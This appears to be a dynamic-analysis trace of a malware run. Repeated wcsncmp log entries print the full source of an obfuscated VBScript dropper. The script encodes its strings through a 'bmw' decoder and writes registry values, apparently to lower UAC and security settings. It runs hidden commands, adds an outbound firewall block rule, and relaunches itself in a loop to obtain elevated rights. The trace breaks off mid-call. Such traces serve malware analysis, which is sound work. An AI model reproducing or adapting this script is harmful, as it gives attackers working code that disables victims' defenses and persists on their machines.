WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0223.014] wcsncmp (_String1="CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0223.014] wcsncmp (_String1="reateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0223.014] wcsncmp (_String1="eateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.014] wcsncmp (_String1="ateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", 